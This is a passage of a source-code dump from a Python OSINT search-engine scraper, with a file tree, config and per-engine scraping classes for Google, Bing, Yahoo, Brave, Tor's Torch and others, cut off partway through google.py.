├── search_engines ├── libs │ ├── __init__.py │ ├── __pycache__ │ │ ├── __init__.cpython-310.pyc │ │ ├── __init__.cpython-311.pyc │ │ ├── windows_cmd_encoding.cpython-310.pyc │ │ └── windows_cmd_encoding.cpython-311.pyc │ ├── get_terminal_size.py │ └── windows_cmd_encoding.py ├── search_results │ └── __init__.py ├── __pycache__ │ ├── utils.cpython-310.pyc │ ├── utils.cpython-311.pyc │ ├── config.cpython-310.pyc │ ├── config.cpython-311.pyc │ ├── engine.cpython-310.pyc │ ├── engine.cpython-311.pyc │ ├── output.cpython-310.pyc │ ├── output.cpython-311.pyc │ ├── results.cpython-310.pyc │ ├── results.cpython-311.pyc │ ├── __init__.cpython-310.pyc │ ├── __init__.cpython-311.pyc │ ├── http_client.cpython-310.pyc │ └── http_client.cpython-311.pyc ├── engines │ ├── __pycache__ │ │ ├── aol.cpython-310.pyc │ │ ├── aol.cpython-311.pyc │ │ ├── ask.cpython-310.pyc │ │ ├── ask.cpython-311.pyc │ │ ├── bing.cpython-310.pyc │ │ ├── bing.cpython-311.pyc │ │ ├── brave.cpython-310.pyc │ │ ├── brave.cpython-311.pyc │ │ ├── dogpile.cpython-310.pyc │ │ ├── dogpile.cpython-311.pyc │ │ ├── google.cpython-310.pyc │ │ ├── google.cpython-311.pyc │ │ ├── mojeek.cpython-310.pyc │ │ ├── mojeek.cpython-311.pyc │ │ ├── qwant.cpython-310.pyc │ │ ├── qwant.cpython-311.pyc │ │ ├── torch.cpython-310.pyc │ │ ├── torch.cpython-311.pyc │ │ ├── yahoo.cpython-310.pyc │ │ ├── yahoo.cpython-311.pyc │ │ ├── __init__.cpython-310.pyc │ │ ├── __init__.cpython-311.pyc │ │ ├── startpage.cpython-310.pyc │ │ ├── startpage.cpython-311.pyc │ │ ├── duckduckgo.cpython-310.pyc │ │ └── duckduckgo.cpython-311.pyc │ ├── aol.py │ ├── __init__.py │ ├── bing.py │ ├── ask.py │ ├── mojeek.py │ ├── torch.py │ ├── brave.py │ ├── metager.py │ ├── dogpile.py │ ├── yahoo.py │ ├── google.py │ ├── qwant.py │ ├── startpage.py │ └── duckduckgo.py ├── __init__.py ├── config.py ├── utils.py ├── results.py ├── http_client.py ├── multiple_search_engines.py ├── output.py └── engine.py ├── Logo.png ├── README.md └── TS-OSINT.py /search_engines/libs/__init__.py: -------------------------------------------------------------------------------- 1 | '''''' 2 | -------------------------------------------------------------------------------- /search_engines/search_results/__init__.py: -------------------------------------------------------------------------------- 1 | '''''' 2 | -------------------------------------------------------------------------------- /Logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trsi-me/TS-OSINT/HEAD/Logo.png -------------------------------------------------------------------------------- /search_engines/__pycache__/utils.cpython-310.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trsi-me/TS-OSINT/HEAD/search_engines/__pycache__/utils.cpython-310.pyc -------------------------------------------------------------------------------- /search_engines/__pycache__/utils.cpython-311.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trsi-me/TS-OSINT/HEAD/search_engines/__pycache__/utils.cpython-311.pyc -------------------------------------------------------------------------------- /search_engines/__pycache__/config.cpython-310.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trsi-me/TS-OSINT/HEAD/search_engines/__pycache__/config.cpython-310.pyc -------------------------------------------------------------------------------- /search_engines/__pycache__/config.cpython-311.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trsi-me/TS-OSINT/HEAD/search_engines/__pycache__/config.cpython-311.pyc -------------------------------------------------------------------------------- /search_engines/__pycache__/engine.cpython-310.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trsi-me/TS-OSINT/HEAD/search_engines/__pycache__/engine.cpython-310.pyc -------------------------------------------------------------------------------- /search_engines/__pycache__/engine.cpython-311.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trsi-me/TS-OSINT/HEAD/search_engines/__pycache__/engine.cpython-311.pyc -------------------------------------------------------------------------------- /search_engines/__pycache__/output.cpython-310.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trsi-me/TS-OSINT/HEAD/search_engines/__pycache__/output.cpython-310.pyc -------------------------------------------------------------------------------- /search_engines/__pycache__/output.cpython-311.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trsi-me/TS-OSINT/HEAD/search_engines/__pycache__/output.cpython-311.pyc -------------------------------------------------------------------------------- /search_engines/__pycache__/results.cpython-310.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trsi-me/TS-OSINT/HEAD/search_engines/__pycache__/results.cpython-310.pyc -------------------------------------------------------------------------------- /search_engines/__pycache__/results.cpython-311.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trsi-me/TS-OSINT/HEAD/search_engines/__pycache__/results.cpython-311.pyc -------------------------------------------------------------------------------- /search_engines/__pycache__/__init__.cpython-310.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trsi-me/TS-OSINT/HEAD/search_engines/__pycache__/__init__.cpython-310.pyc -------------------------------------------------------------------------------- /search_engines/__pycache__/__init__.cpython-311.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trsi-me/TS-OSINT/HEAD/search_engines/__pycache__/__init__.cpython-311.pyc -------------------------------------------------------------------------------- /search_engines/__pycache__/http_client.cpython-310.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trsi-me/TS-OSINT/HEAD/search_engines/__pycache__/http_client.cpython-310.pyc -------------------------------------------------------------------------------- /search_engines/__pycache__/http_client.cpython-311.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trsi-me/TS-OSINT/HEAD/search_engines/__pycache__/http_client.cpython-311.pyc -------------------------------------------------------------------------------- /search_engines/engines/__pycache__/aol.cpython-310.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trsi-me/TS-OSINT/HEAD/search_engines/engines/__pycache__/aol.cpython-310.pyc -------------------------------------------------------------------------------- /search_engines/engines/__pycache__/aol.cpython-311.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trsi-me/TS-OSINT/HEAD/search_engines/engines/__pycache__/aol.cpython-311.pyc -------------------------------------------------------------------------------- /search_engines/engines/__pycache__/ask.cpython-310.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trsi-me/TS-OSINT/HEAD/search_engines/engines/__pycache__/ask.cpython-310.pyc -------------------------------------------------------------------------------- /search_engines/engines/__pycache__/ask.cpython-311.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trsi-me/TS-OSINT/HEAD/search_engines/engines/__pycache__/ask.cpython-311.pyc -------------------------------------------------------------------------------- /search_engines/engines/__pycache__/bing.cpython-310.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trsi-me/TS-OSINT/HEAD/search_engines/engines/__pycache__/bing.cpython-310.pyc -------------------------------------------------------------------------------- /search_engines/engines/__pycache__/bing.cpython-311.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trsi-me/TS-OSINT/HEAD/search_engines/engines/__pycache__/bing.cpython-311.pyc -------------------------------------------------------------------------------- /search_engines/engines/__pycache__/brave.cpython-310.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trsi-me/TS-OSINT/HEAD/search_engines/engines/__pycache__/brave.cpython-310.pyc -------------------------------------------------------------------------------- /search_engines/engines/__pycache__/brave.cpython-311.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trsi-me/TS-OSINT/HEAD/search_engines/engines/__pycache__/brave.cpython-311.pyc -------------------------------------------------------------------------------- /search_engines/engines/__pycache__/dogpile.cpython-310.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trsi-me/TS-OSINT/HEAD/search_engines/engines/__pycache__/dogpile.cpython-310.pyc -------------------------------------------------------------------------------- /search_engines/engines/__pycache__/dogpile.cpython-311.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trsi-me/TS-OSINT/HEAD/search_engines/engines/__pycache__/dogpile.cpython-311.pyc -------------------------------------------------------------------------------- /search_engines/engines/__pycache__/google.cpython-310.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trsi-me/TS-OSINT/HEAD/search_engines/engines/__pycache__/google.cpython-310.pyc -------------------------------------------------------------------------------- /search_engines/engines/__pycache__/google.cpython-311.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trsi-me/TS-OSINT/HEAD/search_engines/engines/__pycache__/google.cpython-311.pyc -------------------------------------------------------------------------------- /search_engines/engines/__pycache__/mojeek.cpython-310.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trsi-me/TS-OSINT/HEAD/search_engines/engines/__pycache__/mojeek.cpython-310.pyc -------------------------------------------------------------------------------- /search_engines/engines/__pycache__/mojeek.cpython-311.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trsi-me/TS-OSINT/HEAD/search_engines/engines/__pycache__/mojeek.cpython-311.pyc -------------------------------------------------------------------------------- /search_engines/engines/__pycache__/qwant.cpython-310.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trsi-me/TS-OSINT/HEAD/search_engines/engines/__pycache__/qwant.cpython-310.pyc -------------------------------------------------------------------------------- /search_engines/engines/__pycache__/qwant.cpython-311.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trsi-me/TS-OSINT/HEAD/search_engines/engines/__pycache__/qwant.cpython-311.pyc -------------------------------------------------------------------------------- /search_engines/engines/__pycache__/torch.cpython-310.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trsi-me/TS-OSINT/HEAD/search_engines/engines/__pycache__/torch.cpython-310.pyc -------------------------------------------------------------------------------- /search_engines/engines/__pycache__/torch.cpython-311.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trsi-me/TS-OSINT/HEAD/search_engines/engines/__pycache__/torch.cpython-311.pyc -------------------------------------------------------------------------------- /search_engines/engines/__pycache__/yahoo.cpython-310.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trsi-me/TS-OSINT/HEAD/search_engines/engines/__pycache__/yahoo.cpython-310.pyc -------------------------------------------------------------------------------- /search_engines/engines/__pycache__/yahoo.cpython-311.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trsi-me/TS-OSINT/HEAD/search_engines/engines/__pycache__/yahoo.cpython-311.pyc -------------------------------------------------------------------------------- /search_engines/libs/__pycache__/__init__.cpython-310.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trsi-me/TS-OSINT/HEAD/search_engines/libs/__pycache__/__init__.cpython-310.pyc -------------------------------------------------------------------------------- /search_engines/libs/__pycache__/__init__.cpython-311.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trsi-me/TS-OSINT/HEAD/search_engines/libs/__pycache__/__init__.cpython-311.pyc -------------------------------------------------------------------------------- /search_engines/engines/__pycache__/__init__.cpython-310.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trsi-me/TS-OSINT/HEAD/search_engines/engines/__pycache__/__init__.cpython-310.pyc -------------------------------------------------------------------------------- /search_engines/engines/__pycache__/__init__.cpython-311.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trsi-me/TS-OSINT/HEAD/search_engines/engines/__pycache__/__init__.cpython-311.pyc -------------------------------------------------------------------------------- /search_engines/engines/__pycache__/startpage.cpython-310.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trsi-me/TS-OSINT/HEAD/search_engines/engines/__pycache__/startpage.cpython-310.pyc -------------------------------------------------------------------------------- /search_engines/engines/__pycache__/startpage.cpython-311.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trsi-me/TS-OSINT/HEAD/search_engines/engines/__pycache__/startpage.cpython-311.pyc -------------------------------------------------------------------------------- /search_engines/engines/__pycache__/duckduckgo.cpython-310.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trsi-me/TS-OSINT/HEAD/search_engines/engines/__pycache__/duckduckgo.cpython-310.pyc -------------------------------------------------------------------------------- /search_engines/engines/__pycache__/duckduckgo.cpython-311.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trsi-me/TS-OSINT/HEAD/search_engines/engines/__pycache__/duckduckgo.cpython-311.pyc -------------------------------------------------------------------------------- /search_engines/libs/__pycache__/windows_cmd_encoding.cpython-310.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trsi-me/TS-OSINT/HEAD/search_engines/libs/__pycache__/windows_cmd_encoding.cpython-310.pyc -------------------------------------------------------------------------------- /search_engines/libs/__pycache__/windows_cmd_encoding.cpython-311.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/trsi-me/TS-OSINT/HEAD/search_engines/libs/__pycache__/windows_cmd_encoding.cpython-311.pyc -------------------------------------------------------------------------------- /search_engines/__init__.py: -------------------------------------------------------------------------------- 1 | from .engines import * 2 | 3 | 4 | __title__ = 'search_engines' 5 | __version__ = '0.5' 6 | __author__ = 'Tasos M. Adamopoulos' 7 | 8 | __all__ = [ 9 | 'Google', 10 | 'Bing', 11 | 'Yahoo', 12 | 'Aol', 13 | 'Duckduckgo', 14 | 'Startpage', 15 | 'Dogpile', 16 | 'Ask', 17 | 'Mojeek', 18 | 'Qwant', 19 | 'Torch' 20 | ] 21 | -------------------------------------------------------------------------------- /search_engines/engines/aol.py: -------------------------------------------------------------------------------- 1 | from .yahoo import Yahoo 2 | from ..config import PROXY, TIMEOUT 3 | 4 | 5 | class Aol(Yahoo): 6 | '''Seaches aol.com''' 7 | def __init__(self, proxy=PROXY, timeout=TIMEOUT): 8 | super(Aol, self).__init__(proxy, timeout) 9 | self._base_url = u'https://search.aol.com' 10 | 11 | def _first_page(self): 12 | '''Returns the initial page and query.''' 13 | url_str = u'{}/aol/search?q={}&ei=UTF-8&nojs=1' 14 | url = url_str.format(self._base_url, self._query) 15 | self._http_client.get(self._base_url) 16 | return {'url':url, 'data':None} 17 | 18 | -------------------------------------------------------------------------------- /search_engines/engines/__init__.py: -------------------------------------------------------------------------------- 1 | from .aol import Aol 2 | from .ask import Ask 3 | from .bing import Bing 4 | from .dogpile import Dogpile 5 | from .duckduckgo import Duckduckgo 6 | from .google import Google 7 | from .mojeek import Mojeek 8 | from .startpage import Startpage 9 | from .torch import Torch 10 | from .yahoo import Yahoo 11 | from .qwant import Qwant 12 | from .brave import Brave 13 | 14 | 15 | search_engines_dict = { 16 | 'google': Google, 17 | 'bing': Bing, 18 | 'yahoo': Yahoo, 19 | 'aol': Aol, 20 | 'duckduckgo': Duckduckgo, 21 | 'startpage': Startpage, 22 | 'dogpile': Dogpile, 23 | 'ask': Ask, 24 | 'mojeek': Mojeek, 25 | 'qwant': Qwant, 26 | 'brave': Brave, 27 | 'torch': Torch 28 | } 29 | -------------------------------------------------------------------------------- /search_engines/config.py: -------------------------------------------------------------------------------- 1 | from os import path as os_path, pardir as os_pardir, name as os_name 2 | from sys import version_info 3 | 4 | 5 | ## Python version 6 | PYTHON_VERSION = version_info.major 7 | 8 | ## Maximum number or pages to search 9 | SEARCH_ENGINE_RESULTS_PAGES = 20 10 | 11 | ## HTTP request timeout 12 | TIMEOUT = 10 13 | 14 | ## Default User-Agent string 15 | USER_AGENT = 'search_engines/0.5 Repo: https://github.com/tasos-py/Search-Engines-Scraper' 16 | 17 | ## Fake User-Agent string - Google desn't like the default user-agent 18 | FAKE_USER_AGENT = 'Mozilla/5.0 (Windows NT 6.1; rv:84.0) Gecko/20100101 Firefox/84.0' 19 | 20 | ## Proxy server 21 | PROXY = None 22 | 23 | ## TOR proxy server 24 | TOR = 'socks5h://127.0.0.1:9050' 25 | 26 | _base_dir = os_path.abspath(os_path.dirname(os_path.abspath(__file__))) 27 | 28 | ## Path to output files 29 | OUTPUT_DIR = os_path.join(_base_dir, 'search_results') + os_path.sep 30 | 31 | -------------------------------------------------------------------------------- /search_engines/utils.py: -------------------------------------------------------------------------------- 1 | import requests 2 | from .config import PYTHON_VERSION 3 | 4 | 5 | def quote_url(url): 6 | '''encodes URLs.''' 7 | if PYTHON_VERSION == 2: 8 | url = encode_str(url) 9 | return requests.utils.quote(url, safe=';/?:@&=+$,#') 10 | 11 | def unquote_url(url): 12 | '''decodes URLs.''' 13 | if PYTHON_VERSION == 2: 14 | url = encode_str(url) 15 | return decode_bytes(requests.utils.unquote(url)) 16 | 17 | def is_url(link): 18 | '''Checks if link is URL''' 19 | parts = requests.utils.urlparse(link) 20 | return bool(parts.scheme and parts.netloc) 21 | 22 | def domain(url): 23 | '''Returns domain form URL''' 24 | host = requests.utils.urlparse(url).netloc 25 | return host.lower().split(':')[0].replace('www.', '') 26 | 27 | def encode_str(s, encoding='utf-8', errors='replace'): 28 | '''Encodes unicode to str, str to bytes.''' 29 | return s if type(s) is bytes else s.encode(encoding, errors=errors) 30 | 31 | def decode_bytes(s, encoding='utf-8', errors='replace'): 32 | '''Decodes bytes to str, str to unicode.''' 33 | return s.decode(encoding, errors=errors) if type(s) is bytes else s 34 | 35 | -------------------------------------------------------------------------------- /search_engines/results.py: -------------------------------------------------------------------------------- 1 | class SearchResults(object): 2 | '''Stores the search results''' 3 | def __init__(self, items=None): 4 | self._results = items or [] 5 | 6 | def links(self): 7 | '''Returns the links found in search results''' 8 | return [row.get('link') for row in self._results] 9 | 10 | def titles(self): 11 | '''Returns the titles found in search results''' 12 | return [row.get('title') for row in self._results] 13 | 14 | def text(self): 15 | '''Returns the text found in search results''' 16 | return [row.get('text') for row in self._results] 17 | 18 | def hosts(self): 19 | '''Returns the domains found in search results''' 20 | return [row.get('host') for row in self._results] 21 | 22 | def results(self): 23 | '''Returns all data found in search results''' 24 | return self._results 25 | 26 | def __getitem__(self, index): 27 | return self._results[index] 28 | 29 | def __len__(self): 30 | return len(self._results) 31 | 32 | def __str__(self): 33 | return ''.format(len(self._results)) 34 | 35 | def append(self, item): 36 | '''appends an item to the results list.''' 37 | self._results.append(item) 38 | 39 | def extend(self, items): 40 | '''appends items to the results list.''' 41 | self._results.extend(items) 42 | -------------------------------------------------------------------------------- /search_engines/engines/bing.py: -------------------------------------------------------------------------------- 1 | from ..engine import SearchEngine 2 | from ..config import PROXY, TIMEOUT, FAKE_USER_AGENT 3 | 4 | 5 | class Bing(SearchEngine): 6 | '''Searches bing.com''' 7 | def __init__(self, proxy=PROXY, timeout=TIMEOUT): 8 | super(Bing, self).__init__(proxy, timeout) 9 | self._base_url = u'https://www.bing.com' 10 | self.set_headers({'User-Agent':FAKE_USER_AGENT}) 11 | 12 | def _selectors(self, element): 13 | '''Returns the appropriate CSS selector.''' 14 | selectors = { 15 | 'url': 'a[href]', 16 | 'title': 'h2', 17 | 'text': 'p', 18 | 'links': 'ol#b_results > li.b_algo', 19 | 'next': 'div#b_content nav[role="navigation"] a.sb_pagN' 20 | } 21 | return selectors[element] 22 | 23 | def _first_page(self): 24 | '''Returns the initial page and query.''' 25 | self._get_page(self._base_url) 26 | url = u'{}/search?q={}&search=&form=QBLH'.format(self._base_url, self._query) 27 | return {'url':url, 'data':None} 28 | 29 | def _next_page(self, tags): 30 | '''Returns the next page URL and post data (if any)''' 31 | selector = self._selectors('next') 32 | next_page = self._get_tag_item(tags.select_one(selector), 'href') 33 | url = None 34 | if next_page: 35 | url = (self._base_url + next_page) 36 | return {'url':url, 'data':None} 37 | -------------------------------------------------------------------------------- /search_engines/engines/ask.py: -------------------------------------------------------------------------------- 1 | from ..engine import SearchEngine 2 | from ..config import PROXY, TIMEOUT 3 | 4 | 5 | class Ask(SearchEngine): 6 | '''Searches ask.com''' 7 | def __init__(self, proxy=PROXY, timeout=TIMEOUT): 8 | super(Ask, self).__init__(proxy, timeout) 9 | self._base_url = 'https://uk.ask.com' 10 | 11 | def _selectors(self, element): 12 | '''Returns the appropriate CSS selector.''' 13 | selectors = { 14 | 'url': 'a.PartialSearchResults-item-title-link.result-link', 15 | 'title': 'a.PartialSearchResults-item-title-link.result-link', 16 | 'text': 'p.PartialSearchResults-item-abstract', 17 | 'links': 'div.PartialSearchResults-body div.PartialSearchResults-item', 18 | 'next': 'li.PartialWebPagination-next a[href]' 19 | } 20 | return selectors[element] 21 | 22 | def _first_page(self): 23 | '''Returns the initial page and query.''' 24 | url_str = u'{}/web?o=0&l=dir&qo=serpSearchTopBox&q={}' 25 | url = url_str.format(self._base_url, self._query) 26 | return {'url':url, 'data':None} 27 | 28 | def _next_page(self, tags): 29 | '''Returns the next page URL and post data (if any)''' 30 | next_page = tags.select_one(self._selectors('next')) 31 | url = None 32 | if next_page: 33 | url = self._base_url + next_page['href'] 34 | return {'url':url, 'data':None} 35 | 36 | -------------------------------------------------------------------------------- /search_engines/engines/mojeek.py: -------------------------------------------------------------------------------- 1 | from ..engine import SearchEngine 2 | from ..config import PROXY, TIMEOUT, FAKE_USER_AGENT 3 | 4 | 5 | class Mojeek(SearchEngine): 6 | '''Searches mojeek.com''' 7 | def __init__(self, proxy=PROXY, timeout=TIMEOUT): 8 | super(Mojeek, self).__init__(proxy, timeout) 9 | self._base_url = 'https://www.mojeek.com' 10 | self.set_headers({'User-Agent':FAKE_USER_AGENT}) 11 | 12 | def _selectors(self, element): 13 | '''Returns the appropriate CSS selector.''' 14 | selectors = { 15 | 'url': 'a.ob[href]', 16 | 'title': 'a.ob[href]', 17 | 'text': 'p.s', 18 | 'links': 'ul.results-standard > li', 19 | 'next': {'href':'div.pagination li a[href]', 'text':'Next'} 20 | } 21 | return selectors[element] 22 | 23 | def _first_page(self): 24 | '''Returns the initial page and query.''' 25 | url = u'{}/search?q={}'.format(self._base_url, self._query) 26 | return {'url':url, 'data':None} 27 | 28 | def _next_page(self, tags): 29 | '''Returns the next page URL and post data (if any)''' 30 | selector = self._selectors('next') 31 | next_page = [ 32 | i['href'] for i in tags.select(selector['href']) 33 | if i.text == selector['text'] 34 | ] 35 | url = (self._base_url + next_page[0]) if next_page else None 36 | return {'url':url, 'data':None} 37 | 38 | -------------------------------------------------------------------------------- /search_engines/engines/torch.py: -------------------------------------------------------------------------------- 1 | from ..engine import SearchEngine 2 | from ..config import TOR, TIMEOUT 3 | from .. import output as out 4 | 5 | 6 | class Torch(SearchEngine): 7 | '''Uses torch search engine. Requires TOR proxy.''' 8 | def __init__(self, proxy=TOR, timeout=TIMEOUT): 9 | super(Torch, self).__init__(proxy, timeout) 10 | self._base_url = u'http://torchdeedp3i2jigzjdmfpn5ttjhthh5wbmda2rr3jvqjg5p77c54dqd.onion' 11 | if not proxy: 12 | out.console('Torch requires TOR proxy!', level=out.Level.warning) 13 | self._current_page = 1 14 | 15 | def _selectors(self, element): 16 | '''Returns the appropriate CSS selector.''' 17 | selectors = { 18 | 'url': 'h5 a[href]', 19 | 'title': 'h5 a[href]', 20 | 'text': 'p', 21 | 'links': 'div.result.mb-3', 22 | 'next': 'ul.pagination a.page-link' 23 | } 24 | return selectors[element] 25 | 26 | def _first_page(self): 27 | '''Returns the initial page and query.''' 28 | url_str = u'{}/search?query={}&action=search' 29 | url = url_str.format(self._base_url, self._query) 30 | return {'url':url, 'data':None} 31 | 32 | def _next_page(self, tags): 33 | '''Returns the next page URL and post data (if any)''' 34 | self._current_page += 1 35 | url_str = u'{}/search?query={}&page={}' 36 | url = url_str.format(self._base_url, self._query, self._current_page) 37 | return {'url':url, 'data':None} 38 | -------------------------------------------------------------------------------- /search_engines/engines/brave.py: -------------------------------------------------------------------------------- 1 | from ..engine import SearchEngine 2 | from ..config import PROXY, TIMEOUT 3 | 4 | 5 | class Brave(SearchEngine): 6 | '''Searches brave.com''' 7 | def __init__(self, proxy=PROXY, timeout=TIMEOUT): 8 | super(Brave, self).__init__(proxy, timeout) 9 | self._base_url = 'https://search.brave.com' 10 | 11 | def _selectors(self, element): 12 | '''Returns the appropriate CSS selector.''' 13 | selectors = { 14 | 'url': 'a.result-header[href]', 15 | 'title': 'a.result-header[href] span.snippet-title', 16 | 'text': 'div.snippet-content', 17 | 'links': 'div#results div[data-loc="main"]', 18 | 'next': {'tag':'div#pagination a[href]', 'text':'Next', 'skip':'disabled'} 19 | } 20 | return selectors[element] 21 | 22 | def _first_page(self): 23 | '''Returns the initial page and query.''' 24 | url_str = u'{}/search?q={}&source=web' 25 | url = url_str.format(self._base_url, self._query) 26 | return {'url':url, 'data':None} 27 | 28 | def _next_page(self, tags): 29 | '''Returns the next page URL and post data (if any)''' 30 | selector = self._selectors('next') 31 | next_page = [ 32 | tag for tag in tags.select(selector['tag']) 33 | if tag.get_text().strip() == selector['text'] and selector['skip'] not in tag['class'] 34 | ] 35 | url = None 36 | if next_page: 37 | url = self._base_url + next_page[0]['href'] 38 | return {'url':url, 'data':None} 39 | 40 | -------------------------------------------------------------------------------- /search_engines/engines/metager.py: -------------------------------------------------------------------------------- 1 | from bs4 import BeautifulSoup 2 | 3 | from search_engines.engine import SearchEngine 4 | from search_engines.config import PROXY, TIMEOUT, FAKE_USER_AGENT 5 | 6 | 7 | class Metager(SearchEngine): 8 | '''Searches metager.org''' 9 | 10 | def __init__(self, proxy=PROXY, timeout=TIMEOUT): 11 | super(Metager, self).__init__(proxy, timeout) 12 | self._base_url = 'https://metager.org' 13 | self.set_headers({'User-Agent': FAKE_USER_AGENT}) 14 | 15 | def _selectors(self, element): 16 | """Returns the appropriate CSS selector.""" 17 | selectors = { 18 | 'url': 'a.result-link', 19 | 'title': 'h2.result-title a', 20 | 'text': 'div.result-description', 21 | 'links': '#results div.result', 22 | 'next': '#next-search-link a', 23 | } 24 | return selectors[element] 25 | 26 | def redirect(self, query): 27 | '''Redirects initial request to actual result page.''' 28 | response = self._get_page(query) 29 | src_page = BeautifulSoup(response.html, "html.parser") 30 | url = src_page.select_one('iframe').get('src') 31 | 32 | return url 33 | 34 | def _first_page(self): 35 | '''Returns the initial page and query.''' 36 | query = f'{self._base_url}/meta/meta.ger3?eingabe={self._query}' 37 | url = self.redirect(query) 38 | 39 | return {'url': url, 'data': None} 40 | 41 | def _next_page(self, tags): 42 | '''Returns the next page URL.''' 43 | next_page = tags.select_one(self._selectors('next')) 44 | url = None 45 | if next_page: 46 | url = self.redirect(next_page['href']) 47 | 48 | return {'url': url, 'data': None} 49 | -------------------------------------------------------------------------------- /search_engines/engines/dogpile.py: -------------------------------------------------------------------------------- 1 | from ..engine import SearchEngine 2 | from ..config import PROXY, TIMEOUT, FAKE_USER_AGENT 3 | from ..utils import unquote_url 4 | 5 | 6 | class Dogpile(SearchEngine): 7 | '''Seaches dogpile.com''' 8 | def __init__(self, proxy=PROXY, timeout=TIMEOUT): 9 | super(Dogpile, self).__init__(proxy, timeout) 10 | self._base_url = 'https://www.dogpile.com' 11 | self.set_headers({'User-Agent':FAKE_USER_AGENT}) 12 | 13 | def _selectors(self, element): 14 | '''Returns the appropriate CSS selector.''' 15 | selectors = { 16 | 'url': 'a[class$=title]', 17 | 'title': 'a[class$=title]', 18 | 'text': {'tag':'span', 'index':-1}, 19 | 'links': 'div[class^=web-] div[class$=__result]', 20 | 'next': 'a.pagination__num--next' 21 | } 22 | return selectors[element] 23 | 24 | def _first_page(self): 25 | '''Returns the initial page and query.''' 26 | url = u'{}/serp?q={}'.format(self._base_url, self._query) 27 | return {'url':url, 'data':None} 28 | 29 | def _next_page(self, tags): 30 | '''Returns the next page URL and post data (if any)''' 31 | selector = self._selectors('next') 32 | next_page = self._get_tag_item(tags.select_one(selector), 'href') 33 | url = (self._base_url + next_page) if next_page else None 34 | return {'url':url, 'data':None} 35 | 36 | def _get_text(self, tag, item='text'): 37 | '''Returns the text of search results items.''' 38 | selector = self._selectors('text') 39 | tag = tag.select(selector['tag'])[selector['index']] 40 | return self._get_tag_item(tag, 'text') 41 | 42 | 43 | -------------------------------------------------------------------------------- /search_engines/engines/yahoo.py: -------------------------------------------------------------------------------- 1 | from ..engine import SearchEngine 2 | from ..config import PROXY, TIMEOUT 3 | from ..utils import unquote_url 4 | 5 | 6 | class Yahoo(SearchEngine): 7 | '''Searches yahoo.com''' 8 | def __init__(self, proxy=PROXY, timeout=TIMEOUT): 9 | super(Yahoo, self).__init__(proxy, timeout) 10 | self._base_url = 'https://search.yahoo.com' 11 | 12 | def _selectors(self, element): 13 | '''Returns the appropriate CSS selector.''' 14 | selectors = { 15 | 'url': 'div.compTitle h3.title a', 16 | 'title': 'div.compTitle h3.title', 17 | 'text': 'div.compText', 18 | 'links': 'div#web li div.dd.algo.algo-sr', 19 | 'next': 'a.next' 20 | } 21 | return selectors[element] 22 | 23 | def _first_page(self): 24 | '''Returns the initial page and query.''' 25 | url_str = u'{}/search?p={}&ei=UTF-8&nojs=1' 26 | url = url_str.format(self._base_url, self._query) 27 | return {'url':url, 'data':None} 28 | 29 | def _next_page(self, tags): 30 | '''Returns the next page URL and post data (if any)''' 31 | selector = self._selectors('next') 32 | url = self._get_tag_item(tags.select_one(selector), 'href') or None 33 | return {'url':url, 'data':None} 34 | 35 | def _get_url(self, link, item='href'): 36 | selector = self._selectors('url') 37 | url = self._get_tag_item(link.select_one(selector), 'href') 38 | url = url.split(u'/RU=')[-1].split(u'/R')[0] 39 | return unquote_url(url) 40 | 41 | def _get_title(self, tag, item='text'): 42 | '''Returns the title of search results items.''' 43 | title = tag.select_one(self._selectors('title')) 44 | for span in title.select('span'): 45 | span.decompose() 46 | return self._get_tag_item(title, item) 47 | 48 | 49 | -------------------------------------------------------------------------------- /search_engines/engines/google.py: -------------------------------------------------------------------------------- 1 | from ..engine import SearchEngine 2 | from ..config import PROXY, TIMEOUT, FAKE_USER_AGENT 3 | from ..utils import unquote_url 4 | 5 | 6 | class Google(SearchEngine): 7 | '''Searches google.com''' 8 | def __init__(self, proxy=PROXY, 